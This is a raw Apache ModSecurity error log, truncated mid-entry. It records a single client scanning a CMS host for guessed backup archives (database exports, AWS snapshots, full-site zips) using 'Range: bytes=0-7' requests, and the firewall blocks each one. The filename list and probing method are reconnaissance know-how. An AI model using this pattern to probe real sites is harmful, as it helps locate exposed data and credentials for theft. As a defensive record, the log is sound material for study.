[ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/media-files.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD38AAAABQ"] [Sun Mar 08 19:04:39.762630 2026] [:error] [pid 13471:tid 13478] [client 35.189.151.148:41874] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/preferences.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD38QAAAAM"] [Sun Mar 08 19:04:39.762821 2026] [:error] [pid 13472:tid 13507] [client 35.189.151.148:39756] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_files.zip"] [unique_id "aa2sJ13UyizU6P-l0YL8ygAAAEU"] [Sun Mar 08 19:04:39.763430 2026] [:error] [pid 11078:tid 11134] [client 35.189.151.148:42500] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/debug.zip"] [unique_id "aa2sJ3-dmvIeGeY060kilgAAAdg"] [Sun Mar 08 19:04:39.763990 2026] [:error] [pid 13472:tid 13544] [client 35.189.151.148:38850] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/themes_backup.zip"] [unique_id "aa2sJ13UyizU6P-l0YL8ywAAAFg"] [Sun Mar 08 19:04:39.764110 2026] [:error] [pid 13472:tid 13525] [client 35.189.151.148:38552] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/general.zip"] [unique_id "aa2sJ13UyizU6P-l0YL8zAAAAFA"] [Sun Mar 08 19:04:39.764328 2026] [:error] [pid 13472:tid 13517] [client 35.189.151.148:59898] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/team.zip"] [unique_id "aa2sJ13UyizU6P-l0YL8zQAAAEw"] [Sun Mar 08 19:04:39.764627 2026] [:error] [pid 13472:tid 13532] [client 35.189.151.148:39562] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/demo.zip"] [unique_id "aa2sJ13UyizU6P-l0YL8zgAAAFM"] [Sun Mar 08 19:04:39.765204 2026] [:error] [pid 13471:tid 13486] [client 35.189.151.148:40206] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/db_export.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD38gAAAAs"] [Sun Mar 08 19:04:39.766621 2026] [:error] [pid 13471:tid 13490] [client 35.189.151.148:39432] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backup_2022.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD38wAAAA8"] [Sun Mar 08 19:04:39.766620 2026] [:error] [pid 13605:tid 13621] [client 35.189.151.148:41040] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/css_files.zip"] [unique_id "aa2sJzLobmDOvyRcAEhfnAAAAM4"] [Sun Mar 08 19:04:39.766628 2026] [:error] [pid 13471:tid 13484] [client 35.189.151.148:40872] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/migrations.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD39AAAAAk"] [Sun Mar 08 19:04:39.766631 2026] [:error] [pid 13473:tid 13540] [client 35.189.151.148:41688] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/primary.zip"] [unique_id "aa2sJ0wwZGElJGd8aN_6FgAAAI4"] [Sun Mar 08 19:04:39.766699 2026] [:error] [pid 11078:tid 11113] [client 35.189.151.148:60322] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/archive_6.zip"] [unique_id "aa2sJ3-dmvIeGeY060kilwAAAcM"] [Sun Mar 08 19:04:39.766754 2026] [:error] [pid 11078:tid 11128] [client 35.189.151.148:37616] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backup_daily.zip"] [unique_id "aa2sJ3-dmvIeGeY060kimAAAAdI"] [Sun Mar 08 19:04:39.766815 2026] [:error] [pid 12902:tid 12958] [client 35.189.151.148:42398] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/soap.zip"] [unique_id "aa2sJ2aTUOdovAC89_RApQAAApc"] [Sun Mar 08 19:04:39.766919 2026] [:error] [pid 13471:tid 13498] [client 35.189.151.148:40858] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backp.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD39QAAABc"] [Sun Mar 08 19:04:39.766971 2026] [:error] [pid 13605:tid 13607] [client 35.189.151.148:42050] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/complete_website_backup.zip"] [unique_id "aa2sJzLobmDOvyRcAEhfngAAAMA"] [Sun Mar 08 19:04:39.766987 2026] [:error] [pid 13605:tid 13623] [client 35.189.151.148:37524] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/wordpress-full.zip"] [unique_id "aa2sJzLobmDOvyRcAEhfnQAAANA"] [Sun Mar 08 19:04:39.767003 2026] [:error] [pid 12902:tid 12940] [client 35.189.151.148:37972] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backup_monthly.zip"] [unique_id "aa2sJ2aTUOdovAC89_RApgAAAoU"] [Sun Mar 08 19:04:39.767021 2026] [:error] [pid 13471:tid 13484] [client 35.189.151.148:37926] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/admin/backup.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD39gAAAAk"] [Sun Mar 08 19:04:39.767115 2026] [:error] [pid 11078:tid 11114] [client 35.189.151.148:44322] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/engine.zip"] [unique_id "aa2sJ3-dmvIeGeY060kimQAAAcQ"] [Sun Mar 08 19:04:39.767119 2026] [:error] [pid 12902:tid 12953] [client 35.189.151.148:40414] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/repository.zip"] [unique_id "aa2sJ2aTUOdovAC89_RApwAAApI"] [Sun Mar 08 19:04:39.767173 2026] [:error] [pid 13472:tid 13506] [client 35.189.151.148:39878] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/members.zip"] [unique_id "aa2sJ13UyizU6P-l0YL8zwAAAEQ"] [Sun Mar 08 19:04:39.767261 2026] [:error] [pid 13472:tid 13517] [client 35.189.151.148:38838] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_ec2_snapshots.zip"] [unique_id "aa2sJ13UyizU6P-l0YL80AAAAEw"] [Sun Mar 08 19:04:39.767348 2026] [:error] [pid 12902:tid 12949] [client 35.189.151.148:41716] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/webservices.zip"] [unique_id "aa2sJ2aTUOdovAC89_RAqAAAAo4"] [Sun Mar 08 19:04:39.767402 2026] [:error] [pid 13473:tid 13529] [client 35.189.151.148:39348] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/april.zip"] [unique_id "aa2sJ0wwZGElJGd8aN_6FwAAAIg"] [Sun Mar 08 19:04:39.767407 2026] [:error] [pid 7010:tid 7059] [client 35.189.151.148:60998] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backup_6.zip"] [unique_id "aa2sJ5q2Bzew8vjPgCG-bwAAAZY"] [Sun Mar 08 19:04:39.767722 2026] [:error] [pid 13471:tid 13479] [client 35.189.151.148:37602] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/production_backup.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD39wAAAAQ"] [Sun Mar 08 19:04:39.767831 2026] [:error] [pid 13471:tid 13475] [client 35.189.151.148:39360] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/hr.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD3-AAAAAA"] [Sun Mar 08 19:04:39.767991 2026] [:error] [pid 13471:tid 13489] [client 35.189.151.148:41912] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_private.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD3-QAAAA4"] [Sun Mar 08 19:04:39.768232 2026] [:error] [pid 13472:tid 13502] [client 35.189.151.148:37274] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/sep.zip"] [unique_id "aa2sJ13UyizU6P-l0YL80QAAAEA"] [Sun Mar 08 19:04:39.768597 2026] [:error] [pid 13471:tid 13497] [client 35.189.151.148:40896] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws-reports.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD3-gAAABY"] [Sun Mar 08 19:04:39.768984 2026] [:error] [pid 13471:tid 13482] [client 35.189.151.148:37696] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/wwwroot.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD3-wAAAAc"] [Sun Mar 08 19:04:39.772354 2026] [:error] [pid 13472:tid 13541] [client 35.189.151.148:60714] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backup-2022.zip"] [unique_id "aa2sJ13UyizU6P-l0YL80gAAAFc"] [Sun Mar 08 19:04:39.772553 2026] [:error] [pid 13471:tid 13485] [client 35.189.151.148:60314] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws-internal.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD3_AAAAAo"] [Sun Mar 08 19:04:39.773086 2026] [:error] [pid 13472:tid 13530] [client 35.189.151.148:32788] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_staging.zip"] [unique_id "aa2sJ13UyizU6P-l0YL80wAAAFI"] [Sun Mar 08 19:04:39.775575 2026] [:error] [pid 13471:tid 13476] [client 35.189.151.148:37540] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws-deploy.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD3_QAAAAE"] [Sun Mar 08 19:04:39.775653 2026] [:error] [pid 7010:tid 7056] [client 35.189.151.148:40522] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/css.zip"] [unique_id "aa2sJ5q2Bzew8vjPgCG-cAAAAZM"] [Sun Mar 08 19:04:39.775691 2026] [:error] [pid 12819:tid 12867] [client 35.189.151.148:40718] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/extensions.zip"] [unique_id "aa2sJ_NtUJnAKTO-2_-26AAAAlY"] [Sun Mar 08 19:04:39.775716 2026] [:error] [pid 11078:tid 11119] [client 35.189.151.148:42750] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws-rds-snapshot.zip"] [unique_id "aa2sJ3-dmvIeGeY060kimgAAAck"] [Sun Mar 08 19:04:39.778262 2026] [:error] [pid 11078:tid 11130] [client 35.189.151.148:60214] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver 